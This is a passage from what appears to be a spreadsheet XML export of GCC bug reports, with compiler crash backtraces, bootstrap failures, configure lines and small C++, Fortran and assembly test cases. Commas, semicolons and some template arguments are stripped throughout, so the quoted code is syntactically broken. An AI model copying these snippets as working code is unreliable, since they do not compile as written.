       static const _Value __min = __glibcxx_min(_Value)
                                                                   ^                                           
0xde006f crash_signal
        /home/jwakely/src/gcc/gcc/gcc/toplev.c:338
0xb2ba10 tree_check(tree_node* char const* int char const* tree_code)
        /home/jwakely/src/gcc/gcc/gcc/tree.h:3082
0xb2ba10 gimple_body(tree_node*)
        /home/jwakely/src/gcc/gcc/gcc/gimple-expr.c:317
0xb538a4 gimple_add_tmp_var(tree_node*)
        /home/jwakely/src/gcc/gcc/gcc/gimplify.c:753
0xb2c1ea create_tmp_var(tree_node* char const*)
        /home/jwakely/src/gcc/gcc/gcc/gimple-expr.c:477
0xe02151 ubsan_encode_value(tree_node* bool)
        /home/jwakely/src/gcc/gcc/gcc/ubsan.c:146
0x936fd4 ubsan_instrument_shift(unsigned int tree_code tree_node* tree_node*)
        /home/jwakely/src/gcc/gcc/gcc/c-family/c-ubsan.c:215
0x8a960d cp_build_binary_op(unsigned int tree_code tree_node* tree_node* int)
        /home/jwakely/src/gcc/gcc/gcc/cp/typeck.c:5282
0x671fca build_new_op_1
        /home/jwakely/src/gcc/gcc/gcc/cp/call.c:6019
0x6730de build_new_op(unsigned int tree_code int tree_node* tree_node* tree_node* tree_node** int)
        /home/jwakely/src/gcc/gcc/gcc/cp/call.c:6064
0x89a252 build_x_binary_op(unsigned int tree_code tree_node* tree_code tree_node* tree_code tree_node** int)
        /home/jwakely/src/gcc/gcc/gcc/cp/typeck.c:3959
0x810657 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        /home/jwakely/src/gcc/gcc/gcc/cp/pt.c:16921
0x812f16 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        /home/jwakely/src/gcc/gcc/gcc/cp/pt.c:17469
0x806f4e tsubst_expr(tree_node* tree_node* int tree_node* bool)
        /home/jwakely/src/gcc/gcc/gcc/cp/pt.c:16534
0x801db0 regenerate_decl_from_template
        /home/jwakely/src/gcc/gcc/gcc/cp/pt.c:22419
0x801db0 instantiate_decl(tree_node* bool bool)
        /home/jwakely/src/gcc/gcc/gcc/cp/pt.c:22854
0x72831f maybe_instantiate_decl
        /home/jwakely/src/gcc/gcc/gcc/cp/decl2.c:4995
0x72af55 mark_used(tree_node* int)
        /home/jwakely/src/gcc/gcc/gcc/cp/decl2.c:5094
0x80fd97 tsubst_qualified_id
        /home/jwakely/src/gcc/gcc/gcc/cp/pt.c:14405
0x8114d9 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        /home/jwakely/src/gcc/gcc/gcc/cp/pt.c:16946
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-70330</t>
  </si>
  <si>
    <t>[5 Regression] ICE with -Wextra -Wno-unused-dummy-argument and unused optional dummy argument</t>
  </si>
  <si>
    <t>function f(o)
      optional o
    end function
causes
gfortran  -Wall -Wextra -Wno-unused-dummy-argument  ice.f90 
fft_full.f90:2:4:
     function f(o)
    1
Warning: Return value of function â€˜fâ€™ at (1) not set [-Wreturn-type]
â€˜
fft_full.f90:4:0:
     end function
 1
in pp_format at pretty-print.c:614
0x102706d pp_format(pretty_printer* text_info*)
        ../../gcc-5.3.0/gcc/pretty-print.c:614
0x1024432 diagnostic_report_diagnostic(diagnostic_context* diagnostic_info*)
        ../../gcc-5.3.0/gcc/diagnostic.c:862
0x1024ad5 warning(int char const* ...)
        ../../gcc-5.3.0/gcc/diagnostic.c:1027
0x86fbeb do_warn_unused_parameter(tree_node*)
        ../../gcc-5.3.0/gcc/function.c:5247
0x79058a cgraph_node::finalize_function(tree_node* bool)
        ../../gcc-5.3.0/gcc/cgraphunit.c:479
0x6e8f69 gfc_generate_function_code(gfc_namespace*)
        ../../gcc-5.3.0/gcc/fortran/trans-decl.c:5984
0x685e30 translate_all_program_units
        ../../gcc-5.3.0/gcc/fortran/parse.c:5343
0x685e30 gfc_parse_file()
        ../../gcc-5.3.0/gcc/fortran/parse.c:5540
0x6c52d5 gfc_be_parse_file
        ../../gcc-5.3.0/gcc/fortran/f95-lang.c:229
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-50743</t>
  </si>
  <si>
    <t>[4.7 regression] objc-act.c triggers -Werror=sign-compare breaking bootstrap</t>
  </si>
  <si>
    <t>Attempting to bootstrap gcc-4.7-20111015 with objc enabled and --disable-build-poststage1-with-cxx fails with:
/mnt/scratch/gcc-4.7-20111015/gcc/objc/objc-act.c: In function 'check_duplicates':
/mnt/scratch/gcc-4.7-20111015/gcc/objc/objc-act.c:5073:21: error: comparison between signed and unsigned integer expressions [-Werror=sign-compare]
/mnt/scratch/gcc-4.7-20111015/gcc/objc/objc-act.c:5106:17: error: comparison between signed and unsigned integer expressions [-Werror=sign-compare]
/mnt/scratch/gcc-4.7-20111015/gcc/objc/objc-act.c: In function 'insert_method_into_method_map':
/mnt/scratch/gcc-4.7-20111015/gcc/objc/objc-act.c:5828:18: error: comparison between signed and unsigned integer expressions [-Werror=sign-compare]
/mnt/scratch/gcc-4.7-20111015/gcc/objc/objc-act.c:5840:18: error: comparison between signed and unsigned integer expressions [-Werror=sign-compare]
cc1: all warnings being treated as errors
make[3]: *** [objc/objc-act.o] Error 1
make[3]: Leaving directory `/mnt/scratch/objdir47/gcc'
make[2]: *** [all-stage2-gcc] Error 2
make[2]: Leaving directory `/mnt/scratch/objdir47'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/mnt/scratch/objdir47'
make: *** [bootstrap] Error 2
This is a regression from r179965:
http://gcc.gnu.org/ml/gcc-cvs/2011-10/msg00561.html
The issue is that the code was rewritten to use a number or for-loops with a size_t index and a TREE_VEC_LENGTH limit however TREE_VEC_LENGTH returns a signed integer resulting in a signed/unsigned comparison.  The C front-end catches this error but the C++ front-end fails to do so due to PR50012.</t>
  </si>
  <si>
    <t>GCC-12047</t>
  </si>
  <si>
    <t>[3.4 Regression] [unit-at-a-time] not emitting typeinfo</t>
  </si>
  <si>
    <t>Enabling optimization at the O3 level breaks the build of the source file
s.C. gcc 3.3 has no problems compiling this code.
Environment:
System: Linux kiste 2.4.20-4GB #1 Fri Jul 11 07:33:18 UTC 2003 i686 unknown unknown GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-threads=posix --enable-languages=cc++f77objc --enable-__cxa_atexit --enable-libstdcxx-debug
How-To-Repeat:
source code s.C
template
struct Range {
    struct Error {}
    Range(T value): value_(value) {
	if (value&gt;=high || value&lt;low)
	    throw Error()
    }
    Range }
    Range }
    operator T() { return value_ }
private:
    T value_
}
extern double const low = -1.0 high = 1.0
Range&lt;double const
int main() {
    try {
	val = 2.0
    } catch (...) {
    }
    return 0
}
g++ -v -O3 s.C
Reading specs from /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/specs
Configured with: ../gcc/configure --enable-threads=posix --enable-languages=cc++f77objc --enable-__cxa_atexit --enable-libstdcxx-debug
Thread model: posix
gcc version 3.4 20030820 (experimental)
 /usr/local/libexec/gcc/i686-pc-linux-gnu/3.4/cc1plus -quiet -v -D_GNU_SOURCE s.C -quiet -dumpbase s.C -mtune=pentiumpro -auxbase s -O3 -version -o /tmp/cckwfSf6.s
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/../../../../include/c++/3.4
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/../../../../include/c++/3.4/i686-pc-linux-gnu
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/../../../../include/c++/3.4/backward
 /usr/local/include
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/include
 /usr/include
End of search list.
GNU C++ version 3.4 20030820 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.4 20030820 (experimental).
GGC heuristics: --param ggc-min-expand=47 --param ggc-min-heapsize=31899
 as -V -Qy -o /tmp/ccWmViR6.o /tmp/cckwfSf6.s
GNU assembler version 2.13.90.0.18 (i486-suse-linux) using BFD version 2.13.90.0.18 20030121 (SuSE Linux)
 /usr/local/libexec/gcc/i686-pc-linux-gnu/3.4/collect2 --eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 /usr/lib/crt1.o /usr/lib/crti.o /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/crtbegin.o -L/usr/local/lib/gcc/i686-pc-linux-gnu/3.4 -L/usr/local/lib/gcc/i686-pc-linux-gnu/3.4/../../.. /tmp/ccWmViR6.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/local/lib/gcc/i686-pc-linux-gnu/3.4/crtend.o /usr/lib/crtn.o
/tmp/ccWmViR6.o(.text+0x52): In function `main':
: undefined reference to `typeinfo for Range::Error'
/tmp/ccWmViR6.o(.gnu.linkonce.t._ZN5RangeIRKdXL_Z3lowEEXL_Z4highEEEaSES1_+0x4b): In function `Range::operator=(double const&amp;)':
: undefined reference to `typeinfo for Range::Error'
collect2: ld returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-27378</t>
  </si>
  <si>
    <t>[4.1 only] ICE on unexpected ELSE statement</t>
  </si>
  <si>
    <t>The following invalid testcase causes an ICE when compiled with -Wall:
===============
else
===============
The error message is:
 In file bug.f90:1
else
   1
Error: Unexpected ELSE statement at (1)
bug.f90:0: internal compiler error: Segmentation fault
Without -Wall I get:
 In file bug.f90:1
else
   1
Error: Unexpected ELSE statement at (1)
Error: Unexpected end of file in 'bug.f90'
This happens since GCC 4.0.1.</t>
  </si>
  <si>
    <t>GCC-26793</t>
  </si>
  <si>
    <t>[4.2 Regression] C++ is broken on powerpc-darwin7.9.0 after __cxa_atexit patch</t>
  </si>
  <si>
    <t>Filing this because I have no longer access to Darwin7.9.0.
See:
http://gcc.gnu.org/ml/gcc-patches/2006-03/msg01207.html</t>
  </si>
  <si>
    <t>GCC-23195</t>
  </si>
  <si>
    <t>[4.0 Regression] Using frexp with fabs produces negative result</t>
  </si>
  <si>
    <t>When frexp is used within a fabs function (as shown below) the value returned is
negative.
double a = fabs(frexp(b 
Example code and temp files are attached.  This code works in gcc version 3.4</t>
  </si>
  <si>
    <t>m.broadbent</t>
  </si>
  <si>
    <t>GCC-34181</t>
  </si>
  <si>
    <t>[4.3 Regression] FAIL: g++.dg/opt/anchor1.C (internal compiler error)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/testsuite/g++/../../g++ -B/test/gnu/
gcc/objdir/gcc/testsuite/g++/../../ /test/gnu/gcc/gcc/gcc/testsuite/g++.dg/opt/a
nchor1.C  -nostdinc++ -I/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/
include/hppa2.0w-hp-hpux11.11 -I/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libst
dc++-v3/include -I/test/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/test/gnu/gcc/gcc/l
ibstdc++-v3/include/backward -I/test/gnu/gcc/gcc/libstdc++-v3/testsuite/util -fm
essage-length=0  -O2  -fno-show-column   -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux
11.11/./libstdc++-v3/src/.libs  -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./l
ibstdc++-v3/src/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libiberty
-lm   -o ./anchor1.exe    (timeout = 300)
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/opt/anchor1.C: In member function 'void Y
Font::_ZTv0_n12_N5YFontD1Ev()':
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/opt/anchor1.C:59: internal compiler error
: in optimize_inline_calls at tree-inline.c:2914
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/opt/anchor1.C: In member function 'void Y
Font::_ZTv0_n12_N5YFontD1Ev()':
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/opt/anchor1.C:59: internal compiler error
: in optimize_inline_calls at tree-inline.c:2914
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: g++.dg/opt/anchor1.C (internal compiler error)
FAIL: g++.dg/opt/anchor1.C (test for excess errors)
Excess errors:
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/opt/anchor1.C:59: internal compiler error
: in optimize_inline_calls at tree-inline.c:2914
WARNING: g++.dg/opt/anchor1.C compilation failed to produce executable
(gdb) p *e
$3 = {caller = 0x7aeaa280 callee = 0x7ac96200 prev_caller = 0x0
  next_caller = 0x0 prev_callee = 0x0 next_callee = 0x0
  call_stmt = 0x7aeafe38 aux = 0x0 inline_failed = 0x0 count = 0
  frequency = 0 loop_nest = 0}
(gdb) bt
#0  optimize_inline_calls (fn=0x7ae78af0) at ../../gcc/gcc/tree-inline.c:2914
#1  0x004b9174 in cgraph_early_inlining () at ../../gcc/gcc/ipa-inline.c:1469
#2  0x00385410 in execute_one_pass (pass=0x400a3228)
    at ../../gcc/gcc/passes.c:1118
...</t>
  </si>
  <si>
    <t>GCC-38276</t>
  </si>
  <si>
    <t>[c++0x] ICE on template specialization involving variadic templates</t>
  </si>
  <si>
    <t>This might be related to #35828 but I don't have time to check their sample code. But don't flame me I have already spent some productive time and managed to strip 2000+ lines of code into only 13.
g++ -std=c++0x bug.cc
GNU C++ (GCC) version 4.4.0 20081124 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 4.4.0 20081124 (experimental) GMP version 4.2.2 MPFR version 2.3.1.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: e8678982a640502ce11e7866db86e867
bug.cc: In instantiation of â€˜problem Foo &gt; Bar Foo &gt; &gt;â€™:
bug.cc:20:   instantiated from here
bug.cc:14: internal compiler error: in finish_member_declaration at cp/semantics.c:2335</t>
  </si>
  <si>
    <t>dragan</t>
  </si>
  <si>
    <t>GCC-14480</t>
  </si>
  <si>
    <t>[4.0 Regression] gcc/config/rs6000/t-rtems is missing</t>
  </si>
  <si>
    <t>gcc/config/rs6000/t-rtems is part of the gcc-3.3 branch but it and its
infrastructure in gcc/config.gcc seems to be missing on all later branches (esp.
gcc-3.4-branch) and on CVS trunk.
This file is required to build powerpc-rtems-gcc therefore having lost this
file is a regression against gcc-3.3.</t>
  </si>
  <si>
    <t>GCC-24808</t>
  </si>
  <si>
    <t>is_object fails to compile with incomplete types</t>
  </si>
  <si>
    <t>Title says it all really code like:
#include 
struct foo
static const bool b = std::tr1::is_object::value
doesn't compile when it should: although many of the type_traits have a precondition that they need not work with incomplete types this isn't one of those traits.
Oh and the error message was:
/usr/local/gcc/4.0.2/lib/gcc/i686-pc-linux-gnu/4.0.2/../../../../include/c++/4.0.2/tr1/type_traits: In instantiation of `const bool std::tr1::__conv_helper::__value':
/usr/local/gcc/4.0.2/lib/gcc/i686-pc-linux-gnu/4.0.2/../../../../include/c++/4.0.2/tr1/type_traits:192:   instantiated from `const bool std::tr1::__is_function_helper::__value'
/usr/local/gcc/4.0.2/lib/gcc/i686-pc-linux-gnu/4.0.2/../../../../include/c++/4.0.2/tr1/type_traits:202:   instantiated from `std::tr1::is_function'
/usr/local/gcc/4.0.2/lib/gcc/i686-pc-linux-gnu/4.0.2/../../../../include/c++/4.0.2/tr1/type_traits:222:   instantiated from `std::tr1::is_object'
/home/john/boost/libs/type_traits/test/is_object_test.cpp:24:   instantiated from here
/usr/local/gcc/4.0.2/lib/gcc/i686-pc-linux-gnu/4.0.2/../../../../include/c++/4.0.2/tr1/type_traits:62: error: invalid use of undefined type `struct incomplete_type'
/home/john/boost/libs/type_traits/test/test.hpp:349: error: forward declaration of `struct incomplete_type'
Regards John Maddock.</t>
  </si>
  <si>
    <t>GCC-3899</t>
  </si>
  <si>
    <t>Compile with -O2 generates internal compiler error</t>
  </si>
  <si>
    <t>Reading specs from /usr/lib/gcc-lib/i386-linux/2.95.4/specs
gcc version 2.95.4 20010703 (Debian prerelease)
 /usr/lib/gcc-lib/i386-linux/2.95.4/cpp0 -lang-c++ -v -I../unix/../include -I../unix/../src -I. -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -D__OPTIMIZE__ -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ derived.cpp derived.ii
GNU CPP version 2.95.4 20010703 (Debian prerelease) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 ../unix/../include
 ../unix/../src
 .
 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/2.95.4/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../i386-linux/include
End of omitted list.
 /usr/lib/gcc-lib/i386-linux/2.95.4/cc1plus derived.ii -quiet -dumpbase derived.cc -O2 -version -fomit-frame-pointer -o derived.s
GNU C++ version 2.95.4 20010703 (Debian prerelease) (i386-linux) compiled by GNU C version 2.95.4 20010703 (Debian prerelease).
derived.cpp: In method `c4_SortSeq::c4_SortSeq(c4_Sequence &amp; c4_Sequence *)':
derived.cpp:662: Internal compiler error.
derived.cpp:662: Please submit a full bug report.
derived.cpp:662: Internal compiler error:
derived.cpp:662: See  for instructions.
Release:
gcc version 2.95.4 20010703 (Debian prerelease)
Environment:
/usr/lib/gcc-lib/i386-linux/2.95.4/cpp0 -lang-c++ -v -I../unix/../include -I../unix/../src -I. -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -D__OPTIMIZE__ -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ derived.cpp derived.ii
GNU CPP version 2.95.4 20010703 (Debian prerelease) (i386 Linux/ELF)</t>
  </si>
  <si>
    <t>lupoja</t>
  </si>
  <si>
    <t>GCC-67995</t>
  </si>
  <si>
    <t>__attribute__ ((target(arch=XXX))) enables unsupported ISA</t>
  </si>
  <si>
    <t>[hjl@gnu-6 pr67985]$ cat r.i
unsigned int
__attribute__ ((target(arch=core2)))
__x86_rdrand(void)
{
  unsigned int retries = 100
  unsigned int val
  while (__builtin_ia32_rdrand32_step(&amp;val) == 0)
    if (--retries == 0)
      return 0
  return val
}
[hjl@gnu-6 pr67985]$ /export/build/gnu/gcc-test/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-test/build-x86_64-linux/gcc/ -O2 -march=haswell -S -o r.s r.i
[hjl@gnu-6 pr67985]$ cat r.s
	.file	r.i
	.text
	.p2align 415
	.globl	__x86_rdrand
	.type	__x86_rdrand @function
__x86_rdrand:
.LFB0:
	.cfi_startproc
	movl	$100 %eax
	movl	$1 %ecx
	jmp	.L2
	.p2align 4
.L4:
	subl	$1 %eax
	je	.L8
.L2:
	rdrand	%edx
	movl	%edx -4(%rsp)
	cmovc	%ecx %edx
	testl	%edx %edx
	je	.L4
	movl	-4(%rsp) %eax
.L8:
	ret
	.cfi_endproc
.LFE0:
	.size	__x86_rdrand .-__x86_rdrand
	.ident	GCC: (GNU) 6.0.0 20151016 (experimental)
	.section	.note.GNU-stack@progbits
[hjl@gnu-6 pr67985]$ 
There should be a warning since rdrand isn't supported on Intel Core 2.</t>
  </si>
  <si>
    <t>GCC-41348</t>
  </si>
  <si>
    <t>Bootstrap fails with --with-arch=i686</t>
  </si>
  <si>
    <t>Compiling GCC started to fail in revision 151361 with the following error:
&gt; Comparing stages 2 and 3
&gt; warning: gcc/cc1-checksum.o differs
&gt; warning: gcc/cc1plus-checksum.o differs
Revision 151360 compiles fine.
I used the following arguments to configure GCC:
../gcc/configure --prefix=/tmp/gcc45 --enable-shared --enable-bootstrap --enable-languages=cc++ --enable-threads=posix --enable-checking=release --with-system-zlib --disable-libunwind-exceptions --enable-__cxa_atexit --enable-libssp --with-gnu-ld --verbose --with-arch=i686 --target=i486-slackware-linux --build=i486-slackware-linux --host=i486-slackware-linux</t>
  </si>
  <si>
    <t>aanisimov</t>
  </si>
  <si>
    <t>GCC-29067</t>
  </si>
  <si>
    <t>gfc_resolve_expr(): Bad expression type</t>
  </si>
  <si>
    <t>gfortran fails on the attached subroutine.
&gt; gfortran -v -save-temps -c ircmva.f
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.1 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --with-tune=i686 --enable-checking=release i486-linux-gnu
Thread model: posix
gcc version 4.1.2 20060901 (prerelease) (Debian 4.1.1-13)
 /usr/lib/gcc/i486-linux-gnu/4.1.2/f951 ircmva.f -ffixed-form -quiet -dumpbase ircmva.f -mtune=i686 -auxbase ircmva -version -o ircmva.s
GNU F95 version 4.1.2 20060901 (prerelease) (Debian 4.1.1-13) (i486-linux-gnu)
        compiled by GNU C version 4.1.2 20060901 (prerelease) (Debian 4.1.1-13).
GGC heuristics: --param ggc-min-expand=99 --param ggc-min-heapsize=129579
 In file ircmva.f:91
      END
                                                                       1
 Internal Error at (1):
 gfc_resolve_expr(): Bad expression type
Source code :
      SUBROUTINE IRCMVA ( NUMCMP NCMPVE NCMPRF
     &gt;                    NVALEC NBPG NBSP NOLOPG
     &gt;                    ADSV ADSD ADSL
     &gt;                    TYMAST MODNUM NUANOM
     &gt;                    VAL PROFAS IDEB IFIN )
      IMPLICIT NONE
      INTEGER NTYMAX
      PARAMETER (NTYMAX = 48)
      INTEGER NCMPVE NCMPRF NVALEC NBPG NBSP
      INTEGER NUMCMP(NCMPRF)
      INTEGER ADSV ADSD ADSL
      INTEGER TYMAST
      INTEGER MODNUM(NTYMAX) NUANOM(NTYMAX*)
      INTEGER PROFAS(*)
      INTEGER IDEB IFIN
      REAL*8 VAL(NCMPVENBSPNBPGNVALEC)
      CHARACTER*32 NOLOPG
      REAL*8       ZR
      LOGICAL      ZL
      COMMON /RVARJE/ZR(1)
      COMMON /LVARJE/ZL(1)
      CHARACTER*6 NOMPRO
      PARAMETER ( NOMPRO = 'IRCMVA' )
      CHARACTER*32 EDELGA
      PARAMETER ( EDELGA='________ELNO____________________' )
      INTEGER IAUX JAUX KAUX
      INTEGER ADSVXX
      INTEGER INO IMA NRCMP NRCMPR NRPG NRSP
      INTEGER IFM NIVINF
      LOGICAL LOGAUX
      CALL INFNIV ( IFM NIVINF )
      IF ( NIVINF.GT.1 ) THEN
        CALL UTMESS ( 'I' NOMPRO
     &gt; 'CREATION DES TABLEAUX DE VALEURS A ECRIRE AVEC :')
        WRITE (IFM13001) NVALEC NCMPVE NBPG NBSP
      ENDIF
13001 FORMAT('  NVALEC ='I8' NCMPVE ='I8
     &gt;       ' NBPG   ='I8' NBSP   ='I8/)
      IF ( TYMAST.EQ.0 ) THEN
        DO 21  NRCMP = 1  NCMPVE
          ADSVXX = ADSV-1+NUMCMP(NRCMP)-NCMPRF
          JAUX = 0
          DO 211  IAUX = IDEB IFIN
            INO = PROFAS(IAUX)
            JAUX = JAUX + 1
            KAUX = INO*NCMPRF
            VAL(NRCMP11JAUX) = ZR(ADSVXX+KAUX)
  211     CONTINUE
   21   CONTINUE
      ELSE
        LOGAUX = .FALSE.
        IF ( NOLOPG(9:16).EQ.EDELGA(9:16) ) THEN
          IF ( MODNUM(TYMAST).EQ.1 ) THEN
            LOGAUX = .TRUE.
          ENDIF
        ENDIF
        IF ( LOGAUX ) THEN
          IF ( NBSP.GT.1 ) THEN
            WRITE (IFM13001) NVALEC NCMPVE NBPG NBSP
            CALL UTMESS ( 'F' NOMPRO
     &gt;     'RENUMEROTATION IMPOSSIBLE AVEC PLUS D''UN SOUS-POINT')
          ENDIF
        ENDIF
        DO 22  NRCMP = 1  NCMPVE
          NRCMPR = NUMCMP(NRCMP)
          JAUX = 0
          IF ( LOGAUX ) THEN
            NRSP = 1
            DO 221  IAUX = IDEB IFIN
              IMA = PROFAS(IAUX)
              JAUX = JAUX + 1
              DO 2211  NRPG = 1  NBPG
                CALL CESEXI ('C'ADSDADSLIMANRPGNRSPNRCMPRKAUX)
                VAL(NRCMPNRSPNUANOM(TYMASTNRPG)JAUX)=ZR(ADSV-1+KAUX)
 2211         CONTINUE
  221       CONTINUE
          ELSE
            DO 222  IAUX = IDEB IFIN
              IMA = PROFAS(IAUX)
              JAUX = JAUX + 1
              DO 2221  NRPG = 1  NBPG
                DO 2222  NRSP = 1  NBSP
                  CALL CESEXI ('C'ADSDADSLIMANRPGNRSPNRCMPRKAUX)
                  VAL(NRCMPNRSPNRPGJAUX) = ZR(ADSV-1+KAUX)
 2222           CONTINUE
 2221         CONTINUE
  222       CONTINUE
          ENDIF
   22   CONTINUE
      ENDIF
      END</t>
  </si>
  <si>
    <t>mathieu.courtois</t>
  </si>
  <si>
    <t>GCC-52297</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: gcc.dg/lto/trans-mem-1 c_lto_trans-mem-1_0.o-c_lto_trans-mem-1_1.o link -flto -fgnu-tm</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/   -
flto -fgnu-tm  -c  -o c_lto_trans-mem-1_0.o /test/gnu/gcc/gcc/gcc/testsuite/gcc.
dg/lto/trans-mem-1_0.c    (timeout = 300)
spawn /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ -flto -fgnu-tm -
c -o c_lto_trans-mem-1_0.o /test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/lto/trans-mem-
1_0.c
PASS: gcc.dg/lto/trans-mem-1 c_lto_trans-mem-1_0.o assemble -flto -fgnu-tm
Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/   -
flto -fgnu-tm  -c  -o c_lto_trans-mem-1_1.o /test/gnu/gcc/gcc/gcc/testsuite/gcc.
dg/lto/trans-mem-1_1.c    (timeout = 300)
spawn /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ -flto -fgnu-tm -
c -o c_lto_trans-mem-1_1.o /test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/lto/trans-mem-1_1.c
PASS: gcc.dg/lto/trans-mem-1 c_lto_trans-mem-1_1.o assemble -flto -fgnu-tm
Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ c_lto_trans-mem-1_0.o c_lto_trans-mem-1_1.o   -flto -fgnu-tm       -o gcc-dg-lto-trans-mem-1-01.exe    (timeout = 300)
spawn /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ c_lto_trans-mem-1_0.o c_lto_trans-mem-1_1.o -flto -fgnu-tm -o gcc-dg-lto-trans-mem-1-01.exe
xgcc: error: libitm.spec: No such file or directory
compiler exited with status 1
output is:
xgcc: error: libitm.spec: No such file or directory
FAIL: gcc.dg/lto/trans-mem-1 c_lto_trans-mem-1_0.o-c_lto_trans-mem-1_1.o link -flto -fgnu-tm
UNRESOLVED: gcc.dg/lto/trans-mem-1 c_lto_trans-mem-1_0.o-c_lto_trans-mem-1_1.o execute -flto -fgnu-tm
Similar fails:
FAIL: gcc.dg/lto/trans-mem-2 c_lto_trans-mem-2_0.o-c_lto_trans-mem-2_1.o link -flto -fgnu-tm
FAIL: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_0.o-c_lto_trans-mem-4_1.o link -flto -fgnu-tm
-bash-3.2$ ./xgcc -B./ -v
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: hppa64-hp-hpux11.11
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu64/bin/as --with-ld=/usr/ccs/bin/ld --enable-shared --with-local-prefix=/opt/gnu64 --prefix=/opt/gnu64/gcc/gcc-4.7 --build=hppa64-hp-hpux11.11 --enable-threads=posix --disable-nls --with-gmp=/opt/gnu64/gcc/gmp --with-libelf=/opt/gnu64 --enable-languages=cc++objcobj-c++fortran
Thread model: posix
gcc version 4.7.0 20120216 (experimental) [trunk revision 184311] (GCC)</t>
  </si>
  <si>
    <t>GCC-49794</t>
  </si>
  <si>
    <t>[4.7 regression] Solaris 10/x86 bootstrap broken by C++ build</t>
  </si>
  <si>
    <t>Solaris 10/x86 bootstrap is broken as of r176500: there are two failures in
stage2 libcpp:
/vol/gcc/src/hg/trunk/local/libcpp/charset.c: In function 'bool convert_using_iconv(iconv_t const uchar* size_t _cpp_strbuf*)':
/vol/gcc/src/hg/trunk/local/libcpp/charset.c:579:62: error: invalid conversion from 'const char**' to 'char**' [-fpermissive]
The problem is that  has two variant iconv() declarations:
#ifdef _XPG6
extern size_t	iconv(iconv_t char **_RESTRICT_KYWD
		size_t *_RESTRICT_KYWD char **_RESTRICT_KYWD
		size_t *_RESTRICT_KYWD)
#else
extern size_t	iconv(iconv_t const char **_RESTRICT_KYWD
